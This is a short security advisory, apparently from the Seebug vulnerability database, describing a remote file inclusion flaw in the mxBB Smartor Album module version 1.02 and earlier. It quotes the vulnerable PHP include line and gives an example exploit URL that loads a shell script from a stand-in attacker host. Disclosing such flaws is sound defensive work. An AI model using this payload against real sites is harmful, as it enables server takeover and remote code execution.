mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability

2006-11-06T00:00:00
ID SSV:5483
Type seebug
Reporter Root
Modified 2006-11-06T00:00:00

Description

No description provided by source.

                                        
                                            
                                                MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}
 
-------------------------------------------------
 
Vulnerable Code:
    if ( $mode == 'album_cat' )
     {
       include($module_root_path. 'includes/album_cat.'.$phpEx);
     }
    (the rest of the vulnerable code removed for brevity)
 
Vulnerability: $module_root_path is uninitialized
 
Source Code:http://www.mx-system.com/index.php?page=4&action=file&file_id=19
 
Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://evil.com/shell.txt?
 
--------------------------------------------------